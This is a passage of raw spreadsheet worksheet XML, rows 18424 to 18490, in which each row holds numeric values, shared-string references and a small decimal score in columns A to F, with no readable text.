    <row r="18424" ht="15.75" customHeight="1">
      <c r="A18424" s="1">
        <v>5634.0</v>
      </c>
      <c r="B18424" s="2">
        <v>4.6231727E7</v>
      </c>
      <c r="C18424" s="2" t="s">
        <v>17760</v>
      </c>
      <c r="D18424" s="2">
        <v>1.0</v>
      </c>
      <c r="E18424" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18424" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18425" ht="15.75" customHeight="1">
      <c r="A18425" s="1">
        <v>7836.0</v>
      </c>
      <c r="B18425" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C18425" s="2" t="s">
        <v>17761</v>
      </c>
      <c r="D18425" s="2">
        <v>1.0</v>
      </c>
      <c r="E18425" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18425" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18426" ht="15.75" customHeight="1">
      <c r="A18426" s="1">
        <v>12132.0</v>
      </c>
      <c r="B18426" s="2">
        <v>2.6975131E7</v>
      </c>
      <c r="C18426" s="2" t="s">
        <v>17762</v>
      </c>
      <c r="D18426" s="2">
        <v>1.0</v>
      </c>
      <c r="E18426" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18426" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18427" ht="15.75" customHeight="1">
      <c r="A18427" s="1">
        <v>22355.0</v>
      </c>
      <c r="B18427" s="2">
        <v>3.4577459E7</v>
      </c>
      <c r="C18427" s="2" t="s">
        <v>17763</v>
      </c>
      <c r="D18427" s="2">
        <v>1.0</v>
      </c>
      <c r="E18427" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18427" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18428" ht="15.75" customHeight="1">
      <c r="A18428" s="1">
        <v>22431.0</v>
      </c>
      <c r="B18428" s="2">
        <v>3.6178199E7</v>
      </c>
      <c r="C18428" s="2" t="s">
        <v>17764</v>
      </c>
      <c r="D18428" s="2">
        <v>1.0</v>
      </c>
      <c r="E18428" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18428" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18429" ht="15.75" customHeight="1">
      <c r="A18429" s="1">
        <v>29225.0</v>
      </c>
      <c r="B18429" s="2">
        <v>3.0827792E7</v>
      </c>
      <c r="C18429" s="2" t="s">
        <v>17765</v>
      </c>
      <c r="D18429" s="2">
        <v>1.0</v>
      </c>
      <c r="E18429" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18429" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18430" ht="15.75" customHeight="1">
      <c r="A18430" s="1">
        <v>31754.0</v>
      </c>
      <c r="B18430" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18430" s="2" t="s">
        <v>17766</v>
      </c>
      <c r="D18430" s="2">
        <v>1.0</v>
      </c>
      <c r="E18430" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18430" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18431" ht="15.75" customHeight="1">
      <c r="A18431" s="1">
        <v>33694.0</v>
      </c>
      <c r="B18431" s="2">
        <v>8457000.0</v>
      </c>
      <c r="C18431" s="2" t="s">
        <v>17767</v>
      </c>
      <c r="D18431" s="2">
        <v>1.0</v>
      </c>
      <c r="E18431" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18431" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="18432" ht="15.75" customHeight="1">
      <c r="A18432" s="1">
        <v>18189.0</v>
      </c>
      <c r="B18432" s="2">
        <v>5.2026559E7</v>
      </c>
      <c r="C18432" s="2" t="s">
        <v>17768</v>
      </c>
      <c r="D18432" s="2">
        <v>1.0</v>
      </c>
      <c r="E18432" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18432" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="18433" ht="15.75" customHeight="1">
      <c r="A18433" s="1">
        <v>413.0</v>
      </c>
      <c r="B18433" s="2">
        <v>1.6746045E7</v>
      </c>
      <c r="C18433" s="2" t="s">
        <v>17769</v>
      </c>
      <c r="D18433" s="2">
        <v>1.0</v>
      </c>
      <c r="E18433" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18433" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18434" ht="15.75" customHeight="1">
      <c r="A18434" s="1">
        <v>14815.0</v>
      </c>
      <c r="B18434" s="2">
        <v>4.094427E7</v>
      </c>
      <c r="C18434" s="2" t="s">
        <v>17770</v>
      </c>
      <c r="D18434" s="2">
        <v>1.0</v>
      </c>
      <c r="E18434" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18434" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18435" ht="15.75" customHeight="1">
      <c r="A18435" s="1">
        <v>18899.0</v>
      </c>
      <c r="B18435" s="2">
        <v>5.4163953E7</v>
      </c>
      <c r="C18435" s="2" t="s">
        <v>17771</v>
      </c>
      <c r="D18435" s="2">
        <v>1.0</v>
      </c>
      <c r="E18435" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18435" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18436" ht="15.75" customHeight="1">
      <c r="A18436" s="1">
        <v>21206.0</v>
      </c>
      <c r="B18436" s="2">
        <v>1.9525634E7</v>
      </c>
      <c r="C18436" s="2" t="s">
        <v>17354</v>
      </c>
      <c r="D18436" s="2">
        <v>1.0</v>
      </c>
      <c r="E18436" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18436" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18437" ht="15.75" customHeight="1">
      <c r="A18437" s="1">
        <v>22280.0</v>
      </c>
      <c r="B18437" s="2">
        <v>3.3306392E7</v>
      </c>
      <c r="C18437" s="2" t="s">
        <v>17772</v>
      </c>
      <c r="D18437" s="2">
        <v>1.0</v>
      </c>
      <c r="E18437" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18437" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18438" ht="15.75" customHeight="1">
      <c r="A18438" s="1">
        <v>22430.0</v>
      </c>
      <c r="B18438" s="2">
        <v>3.6178199E7</v>
      </c>
      <c r="C18438" s="2" t="s">
        <v>17357</v>
      </c>
      <c r="D18438" s="2">
        <v>1.0</v>
      </c>
      <c r="E18438" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18438" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18439" ht="15.75" customHeight="1">
      <c r="A18439" s="1">
        <v>23529.0</v>
      </c>
      <c r="B18439" s="2">
        <v>5887055.0</v>
      </c>
      <c r="C18439" s="2" t="s">
        <v>17773</v>
      </c>
      <c r="D18439" s="2">
        <v>1.0</v>
      </c>
      <c r="E18439" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18439" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18440" ht="15.75" customHeight="1">
      <c r="A18440" s="1">
        <v>27672.0</v>
      </c>
      <c r="B18440" s="2">
        <v>2.2928154E7</v>
      </c>
      <c r="C18440" s="2" t="s">
        <v>17774</v>
      </c>
      <c r="D18440" s="2">
        <v>1.0</v>
      </c>
      <c r="E18440" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18440" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18441" ht="15.75" customHeight="1">
      <c r="A18441" s="1">
        <v>33343.0</v>
      </c>
      <c r="B18441" s="2">
        <v>7599918.0</v>
      </c>
      <c r="C18441" s="2" t="s">
        <v>17647</v>
      </c>
      <c r="D18441" s="2">
        <v>1.0</v>
      </c>
      <c r="E18441" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18441" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="18442" ht="15.75" customHeight="1">
      <c r="A18442" s="1">
        <v>9422.0</v>
      </c>
      <c r="B18442" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C18442" s="2" t="s">
        <v>17775</v>
      </c>
      <c r="D18442" s="2">
        <v>1.0</v>
      </c>
      <c r="E18442" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18442" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18443" ht="15.75" customHeight="1">
      <c r="A18443" s="1">
        <v>10225.0</v>
      </c>
      <c r="B18443" s="2">
        <v>5.7482511E7</v>
      </c>
      <c r="C18443" s="2" t="s">
        <v>17776</v>
      </c>
      <c r="D18443" s="2">
        <v>1.0</v>
      </c>
      <c r="E18443" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18443" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18444" ht="15.75" customHeight="1">
      <c r="A18444" s="1">
        <v>13278.0</v>
      </c>
      <c r="B18444" s="2">
        <v>3.4397148E7</v>
      </c>
      <c r="C18444" s="2" t="s">
        <v>17777</v>
      </c>
      <c r="D18444" s="2">
        <v>1.0</v>
      </c>
      <c r="E18444" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18444" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18445" ht="15.75" customHeight="1">
      <c r="A18445" s="1">
        <v>14950.0</v>
      </c>
      <c r="B18445" s="2">
        <v>4.1298893E7</v>
      </c>
      <c r="C18445" s="2" t="s">
        <v>17778</v>
      </c>
      <c r="D18445" s="2">
        <v>1.0</v>
      </c>
      <c r="E18445" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18445" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18446" ht="15.75" customHeight="1">
      <c r="A18446" s="1">
        <v>20845.0</v>
      </c>
      <c r="B18446" s="2">
        <v>1.5655631E7</v>
      </c>
      <c r="C18446" s="2" t="s">
        <v>17779</v>
      </c>
      <c r="D18446" s="2">
        <v>1.0</v>
      </c>
      <c r="E18446" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18446" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18447" ht="15.75" customHeight="1">
      <c r="A18447" s="1">
        <v>21038.0</v>
      </c>
      <c r="B18447" s="2">
        <v>1.7623992E7</v>
      </c>
      <c r="C18447" s="2" t="s">
        <v>17780</v>
      </c>
      <c r="D18447" s="2">
        <v>1.0</v>
      </c>
      <c r="E18447" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18447" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18448" ht="15.75" customHeight="1">
      <c r="A18448" s="1">
        <v>27873.0</v>
      </c>
      <c r="B18448" s="2">
        <v>2.3541514E7</v>
      </c>
      <c r="C18448" s="2" t="s">
        <v>17781</v>
      </c>
      <c r="D18448" s="2">
        <v>1.0</v>
      </c>
      <c r="E18448" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18448" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="18449" ht="15.75" customHeight="1">
      <c r="A18449" s="1">
        <v>14256.0</v>
      </c>
      <c r="B18449" s="2">
        <v>3.8387812E7</v>
      </c>
      <c r="C18449" s="2" t="s">
        <v>17782</v>
      </c>
      <c r="D18449" s="2">
        <v>1.0</v>
      </c>
      <c r="E18449" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18449" s="2">
        <v>0.1069651741293532</v>
      </c>
    </row>
    <row r="18450" ht="15.75" customHeight="1">
      <c r="A18450" s="1">
        <v>11040.0</v>
      </c>
      <c r="B18450" s="2">
        <v>1.8005595E7</v>
      </c>
      <c r="C18450" s="2" t="s">
        <v>17783</v>
      </c>
      <c r="D18450" s="2">
        <v>1.0</v>
      </c>
      <c r="E18450" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18450" s="2">
        <v>0.1067019400352734</v>
      </c>
    </row>
    <row r="18451" ht="15.75" customHeight="1">
      <c r="A18451" s="1">
        <v>25874.0</v>
      </c>
      <c r="B18451" s="2">
        <v>1.4927562E7</v>
      </c>
      <c r="C18451" s="2" t="s">
        <v>17784</v>
      </c>
      <c r="D18451" s="2">
        <v>1.0</v>
      </c>
      <c r="E18451" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18451" s="2">
        <v>0.1066308243727599</v>
      </c>
    </row>
    <row r="18452" ht="15.75" customHeight="1">
      <c r="A18452" s="1">
        <v>11310.0</v>
      </c>
      <c r="B18452" s="2">
        <v>2.1020746E7</v>
      </c>
      <c r="C18452" s="2" t="s">
        <v>17785</v>
      </c>
      <c r="D18452" s="2">
        <v>1.0</v>
      </c>
      <c r="E18452" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18452" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="18453" ht="15.75" customHeight="1">
      <c r="A18453" s="1">
        <v>3857.0</v>
      </c>
      <c r="B18453" s="2">
        <v>4.0301345E7</v>
      </c>
      <c r="C18453" s="2" t="s">
        <v>17786</v>
      </c>
      <c r="D18453" s="2">
        <v>1.0</v>
      </c>
      <c r="E18453" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18453" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="18454" ht="15.75" customHeight="1">
      <c r="A18454" s="1">
        <v>11843.0</v>
      </c>
      <c r="B18454" s="2">
        <v>2.4715438E7</v>
      </c>
      <c r="C18454" s="2" t="s">
        <v>17787</v>
      </c>
      <c r="D18454" s="2">
        <v>1.0</v>
      </c>
      <c r="E18454" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18454" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="18455" ht="15.75" customHeight="1">
      <c r="A18455" s="1">
        <v>14499.0</v>
      </c>
      <c r="B18455" s="2">
        <v>3.9662301E7</v>
      </c>
      <c r="C18455" s="2" t="s">
        <v>17788</v>
      </c>
      <c r="D18455" s="2">
        <v>1.0</v>
      </c>
      <c r="E18455" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18455" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="18456" ht="15.75" customHeight="1">
      <c r="A18456" s="1">
        <v>3830.0</v>
      </c>
      <c r="B18456" s="2">
        <v>4.0172773E7</v>
      </c>
      <c r="C18456" s="2" t="s">
        <v>17789</v>
      </c>
      <c r="D18456" s="2">
        <v>1.0</v>
      </c>
      <c r="E18456" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18456" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18457" ht="15.75" customHeight="1">
      <c r="A18457" s="1">
        <v>5416.0</v>
      </c>
      <c r="B18457" s="2">
        <v>4.5543554E7</v>
      </c>
      <c r="C18457" s="2" t="s">
        <v>17790</v>
      </c>
      <c r="D18457" s="2">
        <v>1.0</v>
      </c>
      <c r="E18457" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18457" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18458" ht="15.75" customHeight="1">
      <c r="A18458" s="1">
        <v>5471.0</v>
      </c>
      <c r="B18458" s="2">
        <v>4.570848E7</v>
      </c>
      <c r="C18458" s="2" t="s">
        <v>17791</v>
      </c>
      <c r="D18458" s="2">
        <v>1.0</v>
      </c>
      <c r="E18458" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18458" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18459" ht="15.75" customHeight="1">
      <c r="A18459" s="1">
        <v>7343.0</v>
      </c>
      <c r="B18459" s="2">
        <v>5.0966078E7</v>
      </c>
      <c r="C18459" s="2" t="s">
        <v>17792</v>
      </c>
      <c r="D18459" s="2">
        <v>1.0</v>
      </c>
      <c r="E18459" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18459" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18460" ht="15.75" customHeight="1">
      <c r="A18460" s="1">
        <v>8229.0</v>
      </c>
      <c r="B18460" s="2">
        <v>5.3350333E7</v>
      </c>
      <c r="C18460" s="2" t="s">
        <v>17793</v>
      </c>
      <c r="D18460" s="2">
        <v>1.0</v>
      </c>
      <c r="E18460" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18460" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18461" ht="15.75" customHeight="1">
      <c r="A18461" s="1">
        <v>10807.0</v>
      </c>
      <c r="B18461" s="2">
        <v>1.5836575E7</v>
      </c>
      <c r="C18461" s="2" t="s">
        <v>17794</v>
      </c>
      <c r="D18461" s="2">
        <v>1.0</v>
      </c>
      <c r="E18461" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18461" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18462" ht="15.75" customHeight="1">
      <c r="A18462" s="1">
        <v>15735.0</v>
      </c>
      <c r="B18462" s="2">
        <v>4.4078538E7</v>
      </c>
      <c r="C18462" s="2" t="s">
        <v>17795</v>
      </c>
      <c r="D18462" s="2">
        <v>1.0</v>
      </c>
      <c r="E18462" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18462" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18463" ht="15.75" customHeight="1">
      <c r="A18463" s="1">
        <v>15964.0</v>
      </c>
      <c r="B18463" s="2">
        <v>4.478792E7</v>
      </c>
      <c r="C18463" s="2" t="s">
        <v>17796</v>
      </c>
      <c r="D18463" s="2">
        <v>1.0</v>
      </c>
      <c r="E18463" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18463" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18464" ht="15.75" customHeight="1">
      <c r="A18464" s="1">
        <v>16425.0</v>
      </c>
      <c r="B18464" s="2">
        <v>4.6317193E7</v>
      </c>
      <c r="C18464" s="2" t="s">
        <v>17797</v>
      </c>
      <c r="D18464" s="2">
        <v>1.0</v>
      </c>
      <c r="E18464" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18464" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18465" ht="15.75" customHeight="1">
      <c r="A18465" s="1">
        <v>21280.0</v>
      </c>
      <c r="B18465" s="2">
        <v>2.0346118E7</v>
      </c>
      <c r="C18465" s="2" t="s">
        <v>17798</v>
      </c>
      <c r="D18465" s="2">
        <v>1.0</v>
      </c>
      <c r="E18465" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18465" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18466" ht="15.75" customHeight="1">
      <c r="A18466" s="1">
        <v>22319.0</v>
      </c>
      <c r="B18466" s="2">
        <v>3.3994055E7</v>
      </c>
      <c r="C18466" s="2" t="s">
        <v>17799</v>
      </c>
      <c r="D18466" s="2">
        <v>1.0</v>
      </c>
      <c r="E18466" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18466" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18467" ht="15.75" customHeight="1">
      <c r="A18467" s="1">
        <v>23216.0</v>
      </c>
      <c r="B18467" s="2">
        <v>5277023.0</v>
      </c>
      <c r="C18467" s="2" t="s">
        <v>17800</v>
      </c>
      <c r="D18467" s="2">
        <v>1.0</v>
      </c>
      <c r="E18467" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18467" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18468" ht="15.75" customHeight="1">
      <c r="A18468" s="1">
        <v>23964.0</v>
      </c>
      <c r="B18468" s="2">
        <v>9019688.0</v>
      </c>
      <c r="C18468" s="2" t="s">
        <v>17801</v>
      </c>
      <c r="D18468" s="2">
        <v>1.0</v>
      </c>
      <c r="E18468" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18468" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18469" ht="15.75" customHeight="1">
      <c r="A18469" s="1">
        <v>25741.0</v>
      </c>
      <c r="B18469" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C18469" s="2" t="s">
        <v>17802</v>
      </c>
      <c r="D18469" s="2">
        <v>1.0</v>
      </c>
      <c r="E18469" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18469" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18470" ht="15.75" customHeight="1">
      <c r="A18470" s="1">
        <v>26026.0</v>
      </c>
      <c r="B18470" s="2">
        <v>1.5386361E7</v>
      </c>
      <c r="C18470" s="2" t="s">
        <v>17803</v>
      </c>
      <c r="D18470" s="2">
        <v>1.0</v>
      </c>
      <c r="E18470" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18470" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18471" ht="15.75" customHeight="1">
      <c r="A18471" s="1">
        <v>26430.0</v>
      </c>
      <c r="B18471" s="2">
        <v>1.7164198E7</v>
      </c>
      <c r="C18471" s="2" t="s">
        <v>17804</v>
      </c>
      <c r="D18471" s="2">
        <v>1.0</v>
      </c>
      <c r="E18471" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18471" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18472" ht="15.75" customHeight="1">
      <c r="A18472" s="1">
        <v>27045.0</v>
      </c>
      <c r="B18472" s="2">
        <v>2.0233405E7</v>
      </c>
      <c r="C18472" s="2" t="s">
        <v>17805</v>
      </c>
      <c r="D18472" s="2">
        <v>1.0</v>
      </c>
      <c r="E18472" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18472" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18473" ht="15.75" customHeight="1">
      <c r="A18473" s="1">
        <v>27057.0</v>
      </c>
      <c r="B18473" s="2">
        <v>2.0346117E7</v>
      </c>
      <c r="C18473" s="2" t="s">
        <v>17798</v>
      </c>
      <c r="D18473" s="2">
        <v>1.0</v>
      </c>
      <c r="E18473" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18473" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18474" ht="15.75" customHeight="1">
      <c r="A18474" s="1">
        <v>28597.0</v>
      </c>
      <c r="B18474" s="2">
        <v>2.7007105E7</v>
      </c>
      <c r="C18474" s="2" t="s">
        <v>17806</v>
      </c>
      <c r="D18474" s="2">
        <v>1.0</v>
      </c>
      <c r="E18474" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18474" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18475" ht="15.75" customHeight="1">
      <c r="A18475" s="1">
        <v>29118.0</v>
      </c>
      <c r="B18475" s="2">
        <v>3.0454079E7</v>
      </c>
      <c r="C18475" s="2" t="s">
        <v>17807</v>
      </c>
      <c r="D18475" s="2">
        <v>1.0</v>
      </c>
      <c r="E18475" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18475" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18476" ht="15.75" customHeight="1">
      <c r="A18476" s="1">
        <v>29390.0</v>
      </c>
      <c r="B18476" s="2">
        <v>3.1878332E7</v>
      </c>
      <c r="C18476" s="2" t="s">
        <v>17808</v>
      </c>
      <c r="D18476" s="2">
        <v>1.0</v>
      </c>
      <c r="E18476" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18476" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18477" ht="15.75" customHeight="1">
      <c r="A18477" s="1">
        <v>31593.0</v>
      </c>
      <c r="B18477" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C18477" s="2" t="s">
        <v>17809</v>
      </c>
      <c r="D18477" s="2">
        <v>1.0</v>
      </c>
      <c r="E18477" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18477" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18478" ht="15.75" customHeight="1">
      <c r="A18478" s="1">
        <v>32121.0</v>
      </c>
      <c r="B18478" s="2">
        <v>5408895.0</v>
      </c>
      <c r="C18478" s="2" t="s">
        <v>17810</v>
      </c>
      <c r="D18478" s="2">
        <v>1.0</v>
      </c>
      <c r="E18478" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18478" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18479" ht="15.75" customHeight="1">
      <c r="A18479" s="1">
        <v>32454.0</v>
      </c>
      <c r="B18479" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C18479" s="2" t="s">
        <v>17811</v>
      </c>
      <c r="D18479" s="2">
        <v>1.0</v>
      </c>
      <c r="E18479" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18479" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18480" ht="15.75" customHeight="1">
      <c r="A18480" s="1">
        <v>32846.0</v>
      </c>
      <c r="B18480" s="2">
        <v>6253471.0</v>
      </c>
      <c r="C18480" s="2" t="s">
        <v>17812</v>
      </c>
      <c r="D18480" s="2">
        <v>1.0</v>
      </c>
      <c r="E18480" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18480" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18481" ht="15.75" customHeight="1">
      <c r="A18481" s="1">
        <v>33848.0</v>
      </c>
      <c r="B18481" s="2">
        <v>9019687.0</v>
      </c>
      <c r="C18481" s="2" t="s">
        <v>17801</v>
      </c>
      <c r="D18481" s="2">
        <v>1.0</v>
      </c>
      <c r="E18481" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18481" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18482" ht="15.75" customHeight="1">
      <c r="A18482" s="1">
        <v>34022.0</v>
      </c>
      <c r="B18482" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C18482" s="2" t="s">
        <v>17813</v>
      </c>
      <c r="D18482" s="2">
        <v>1.0</v>
      </c>
      <c r="E18482" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18482" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="18483" ht="15.75" customHeight="1">
      <c r="A18483" s="1">
        <v>1450.0</v>
      </c>
      <c r="B18483" s="2">
        <v>2.6825804E7</v>
      </c>
      <c r="C18483" s="2" t="s">
        <v>17814</v>
      </c>
      <c r="D18483" s="2">
        <v>1.0</v>
      </c>
      <c r="E18483" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18483" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18484" ht="15.75" customHeight="1">
      <c r="A18484" s="1">
        <v>7104.0</v>
      </c>
      <c r="B18484" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C18484" s="2" t="s">
        <v>17815</v>
      </c>
      <c r="D18484" s="2">
        <v>1.0</v>
      </c>
      <c r="E18484" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18484" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18485" ht="15.75" customHeight="1">
      <c r="A18485" s="1">
        <v>12195.0</v>
      </c>
      <c r="B18485" s="2">
        <v>2.7491642E7</v>
      </c>
      <c r="C18485" s="2" t="s">
        <v>17816</v>
      </c>
      <c r="D18485" s="2">
        <v>1.0</v>
      </c>
      <c r="E18485" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18485" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18486" ht="15.75" customHeight="1">
      <c r="A18486" s="1">
        <v>12866.0</v>
      </c>
      <c r="B18486" s="2">
        <v>3.1905403E7</v>
      </c>
      <c r="C18486" s="2" t="s">
        <v>17817</v>
      </c>
      <c r="D18486" s="2">
        <v>1.0</v>
      </c>
      <c r="E18486" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18486" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18487" ht="15.75" customHeight="1">
      <c r="A18487" s="1">
        <v>15364.0</v>
      </c>
      <c r="B18487" s="2">
        <v>4.2716333E7</v>
      </c>
      <c r="C18487" s="2" t="s">
        <v>17818</v>
      </c>
      <c r="D18487" s="2">
        <v>1.0</v>
      </c>
      <c r="E18487" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18487" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18488" ht="15.75" customHeight="1">
      <c r="A18488" s="1">
        <v>16975.0</v>
      </c>
      <c r="B18488" s="2">
        <v>4.8300323E7</v>
      </c>
      <c r="C18488" s="2" t="s">
        <v>17819</v>
      </c>
      <c r="D18488" s="2">
        <v>1.0</v>
      </c>
      <c r="E18488" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18488" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18489" ht="15.75" customHeight="1">
      <c r="A18489" s="1">
        <v>20070.0</v>
      </c>
      <c r="B18489" s="2">
        <v>8828125.0</v>
      </c>
      <c r="C18489" s="2" t="s">
        <v>17820</v>
      </c>
      <c r="D18489" s="2">
        <v>1.0</v>
      </c>
      <c r="E18489" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18489" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18490" ht="15.75" customHeight="1">
      <c r="A18490" s="1">
        <v>22038.0</v>
      </c>
      <c r="B18490" s="2">
        <v>3.0205178E7</v>
      </c>
      <c r="C18490" s="2" t="s">
        <v>17821</v>
      </c>
      <c r="D18490" s="2">
        <v>1.0</v>
      </c>
      <c r="E18490" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18490" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="18491" ht="15.75" customHeight="1">
